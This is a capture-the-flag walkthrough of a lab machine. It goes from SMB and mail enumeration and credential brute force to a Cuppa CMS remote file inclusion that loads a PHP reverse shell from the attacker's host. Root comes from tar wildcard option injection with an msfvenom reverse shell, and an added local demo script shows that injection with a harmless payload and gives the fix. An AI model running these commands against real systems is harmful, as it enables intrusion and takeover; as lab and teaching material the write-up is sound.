Recon
Network Enum
I ran an nmap scan against the target machine. Open ports:
- ssh (22): worth exploring
- http (80): web server running
- pop3 (110): a mail server may be running
- netbios-ssn (139): worth exploring
- imap (143): a mail server may be running
- microsoft-ds (445): SMB is worth exploring
Web Enum
I ran gobuster to enumerate directories on the web server:
gobuster dir -u http://10.10.134.0:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40
The scan found these directories:
- /admin
- /css
- /js
- /config
- /ai
- /squirrelmail (this will be interesting to explore)
Most of the directories are restricted.
The squirrelmail page works, but it needs login credentials, which I don't have yet. The goal now is to find the email credentials.
Service Enum
Now I am going to look at the SMB service running at port 445.
I connected to the SMB anonymous share (-N skips the password prompt):
smbclient -N //[TARGET IP]/anonymous
The listed files looked like a promising place to find a clue to the email credentials.
I then downloaded the whole share:
smbget -R smb://[TARGET IP]/anonymous
After inspecting the content, I found a list of possible passwords (perhaps belonging to Miles?).
Using Burp Intruder, I brute-forced the SquirrelMail login with the username milesdyson and that list.
Eventually, the password for milesdyson turned out to be cyborg007haloterminator.
Once logged in as milesdyson, I saw a number of emails. One of them contained the SMB password for milesdyson.
To summarize, these are the found credentials:
Username: milesdyson
Email Password: cyborg007haloterminator
SMB Password: )s{A&2Z=F^n_E.B`
I connected to the milesdyson SMB share with these credentials:
smbclient //[TARGET IP]/milesdyson -U milesdyson
and was able to log in.
At first glance, most of the files are machine learning PDFs.
The notes folder contains a number of markdown files, but I spotted a text file named “important.txt”.
Inside important.txt, I saw that milesdyson has a custom CMS with the link “
Next I enumerated directories in the CMS.
Initially this failed because I had omitted the trailing slash from the URL. With the slash added, I ran:
gobuster dir -u http://10.10.134.0:80/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40
- /administrator was found.
Navigating to this directory shows a CMS named “Cuppa CMS”.
Foothold
To summarize, I found three possible ways to gain a foothold into the system.
- ssh
- squirrelmail
- Cuppa CMS
ssh
I tried to brute-force the milesdyson account with hydra:
hydra -l milesdyson -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-500.txt [TARGET IP] ssh
But this did not work.
Squirrelmail
I searched for exploits for SquirrelMail (version 1.4.23).
There is an interesting RCE exploit:
https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
I followed the steps but the exploit did not work. The advisory notes that the injection is only reachable when SquirrelMail is configured to deliver mail through the local sendmail binary rather than over SMTP, so it does not apply to every install.
Cuppa CMS
I struggled to find credentials for Cuppa CMS (I tried the milesdyson credentials in case of password reuse).
Searching for Cuppa CMS exploits, this looked promising:
https://www.exploit-db.com/exploits/25971
The alerts/alertConfigField.php page includes whatever path or URL is passed in the urlConfig parameter, without any login, so it gives both remote and local file inclusion.
The examples given in the exploit:
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
I started a Python HTTP server so the CMS could fetch my shell files, and tried a few payloads.
A basic PHP web shell with a cmd parameter did not work.
To learn more, I read the CMS configuration file through the LFI using the php://filter wrapper, which returns the source base64-encoded instead of executing it:
http://10.10.134.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
At the time I assumed there was a file extension restriction (txt and jpeg allowed, php not), so I created a PHP reverse shell and prepended a JPEG magic number with a hex editor to make it look like an image. That step is not what mattered: PHP's include() evaluates the PHP tags of whatever it fetches regardless of the file name or its leading bytes, and the request below includes the file by its .php name.
I started an nc listener and requested the reverse shell through the RFI:
http://10.10.134.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.4.3.145:8889/php-reverse-shell.php
This worked and I had a shell on the machine.
I immediately ran id and whoami to check which account this is: www-data.
The user flag is in milesdyson's home directory.
With a foothold gained, I need to escalate privileges.
Privilege Escalation
I tried to use sudo but got an error: the reverse shell has no tty, so it behaves as if “jailed”.
The fix is to spawn a tty shell (Link: https://netsec.ws/?p=337). I used python:
python -c 'import pty; pty.spawn("/bin/sh")'
Now sudo runs, but that is of little use since I don't know the password of the current user, www-data.
I then ran some Linux enumeration scripts (lse.sh and LinEnum.sh).
The likely vectors are the crontab and the SUID binaries.
I tried the SUID binaries first and struggled, again because I had no password for sudo. A lot of time was lost here.
So I looked at the crontab: a backup.sh job is executed by the root user.
I looked at the content of backup.sh:
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
So root cds into /var/www/html and archives everything matched by the unquoted wildcard.
As www-data I control the contents of /var/www/html.
The Linux PE checklist lists a matching vector: option injection through tar's wildcard.
https://app.gitbook.com/@bobbylin/s/oscp-playbook/privilege-escalation/linux-privesc#wildcards
I followed the exact steps and noticed I had missed one.
I created two files in /var/www/html, the directory tar globs, named so that the * expands them into tar options:
touch /var/www/html/--checkpoint=1
touch /var/www/html/--checkpoint-action=exec=shell.elf
Then I generated shell.elf on the attacker machine and downloaded it into the same directory on the target:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=[ATTACKER IP] LPORT=3333 -f elf -o shell.elf
I started a listener on the matching port and waited.
After a few minutes there was no connection from the target machine.
I took a hint and saw that something was wrong with my shell file, so I changed the second filename to:
touch "/var/www/html/--checkpoint-action=exec=sh shell.elf"
This worked and I got a connection as root.
Note that tar hands the exec action to /bin/sh -c: a bare shell.elf is resolved through PATH rather than the current directory, which is why the first attempt never called back. sh shell.elf only works when the payload file is a shell script; a compiled ELF payload would instead need exec=./shell.elf and the execute bit.
root.txt is in the root directory.
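As an added example (not from the original writeup), the script below reproduces the wildcard injection locally so the mechanics can be checked without a root cron job. It builds a stand-in for /var/www/html in a temporary directory, plants the two option-shaped filenames, runs the same `tar cf backup.tgz *` that backup.sh runs, and reports who executed the planted payload. The payload is a script named shell.elf that only records the caller (standing in for the msfvenom reverse shell); the three action strings it compares, including exec=./shell.elf, are my own choices for illustration. It needs GNU tar, since --checkpoint is a GNU extension, and runs entirely as the current user: in the cron scenario the same command runs as root.

```shell
#!/bin/sh
# Added demonstration of tar wildcard option injection (example code, not from the writeup).
# Everything runs as the current user in a temporary directory; the payload only records
# who executed it. Requires GNU tar (--checkpoint is not in bsdtar/busybox tar).
set -eu

# Run "cd DIR && tar cf backup.tgz *" the way backup.sh does, after planting two filenames
# that the unquoted * turns into tar options. Prints the user recorded by the payload,
# or nothing if the payload never ran.
# $1: value for the planted --checkpoint-action file (e.g. "exec=sh shell.elf")
run_backup_with_action() {
    work=$(mktemp -d)
    html="$work/html"            # stands in for /var/www/html (writable by the attacker)
    marker="$work/executed"
    mkdir "$html"
    printf '<html></html>\n' > "$html/index.html"

    # Payload: a shell script standing in for the reverse shell. It just records the caller.
    # (Named shell.elf as in the writeup, but it is a script, not a compiled ELF.)
    printf '#!/bin/sh\nid -un > "%s"\n' "$marker" > "$html/shell.elf"
    chmod +x "$html/shell.elf"

    # The two planted filenames. Quoting keeps the space inside one file name, so the
    # glob hands tar a single argument "--checkpoint-action=exec=sh shell.elf".
    touch "$html/--checkpoint=1"
    touch "$html/--checkpoint-action=$1"

    # Simulated cron job: identical to the two lines of backup.sh. A failing action
    # only writes to stderr; tar itself still exits successfully.
    ( cd "$html" && tar cf "$work/backup.tgz" * 2>/dev/null ) || true

    if [ -f "$marker" ]; then cat "$marker"; fi
    rm -rf "$work"
}

# Compare the action string the writeup tried first, the form it used in the end,
# and the form a compiled binary would need.
demo() {
    # Bare name: /bin/sh -c looks it up in PATH, not in the archive directory, so nothing runs.
    printf 'exec=shell.elf     -> "%s"\n' "$(run_backup_with_action 'exec=shell.elf')"
    # Explicit ./ path: works for any executable file (unless the filesystem is noexec).
    printf 'exec=./shell.elf   -> "%s"\n' "$(run_backup_with_action 'exec=./shell.elf')"
    # Run through sh: works whenever the payload is a shell script, no execute bit needed.
    printf 'exec=sh shell.elf  -> "%s"\n' "$(run_backup_with_action 'exec=sh shell.elf')"
}

demo
```

In the cron scenario the name printed for the working forms is root, because tar, and therefore /bin/sh -c and the payload, inherit the privileges of the process that ran the backup. The defence is on the tar side: quote or avoid the wildcard (`tar cf backup.tgz -- *`, or `tar cf backup.tgz .`), so file names can never be parsed as options.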